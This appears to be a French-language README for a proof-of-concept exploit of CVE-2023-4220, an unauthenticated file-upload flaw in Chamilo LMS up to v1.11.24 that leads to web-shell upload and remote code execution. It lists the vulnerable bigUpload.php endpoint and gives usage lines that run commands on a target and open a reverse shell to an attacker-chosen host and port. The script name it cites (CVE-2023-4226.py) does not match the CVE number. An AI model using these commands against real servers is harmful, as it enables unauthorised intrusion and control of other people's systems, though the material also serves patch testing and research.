
Preuve de concept pour CVE-2023-4220 - Chamilo LMS : Exécution de code à distance non authentifiée via un fichier de téléchargement volumineux
Plus d'informations sur CVE-2023-4220: StarLabs Advisory
| Produit | Chamilo |
|---|---|
| Éditeur | Chamilo |
| Sévérité | Élevée - Les adversaires peuvent exploiter des vulnérabilités logicielles pour obtenir une exécution de code à distance non authentifiée. |
| Versions affectées | <= v1.11.24 |
| Versions testées | v1.11.24 (dernière version au moment de la rédaction) |
| Identifiant CVE | CVE-2023-4220 |
| Description CVE | Téléchargement de fichier sans restriction dans la fonctionnalité de téléchargement de gros fichiers dans /main/inc/lib/javascript/bigupload/inc/bigUpload.php dans Chamilo LMS <= v1.11.24 permet à des attaquants non authentifiés d'effectuer des attaques de script intersite stocké et d'obtenir une exécution de code à distance via le téléchargement d'un web shell. |
| Classification CWE | CWE-434: Téléchargement sans restriction d'un fichier de type dangereux |
| Classification CAPEC | CAPEC-650: Téléchargement d'un Web Shell vers un serveur Web |
Pour exécuter des commandes directement, utilisez la commande suivante :
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
Pour obtenir un reverse shell, utilisez la commande suivante :
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>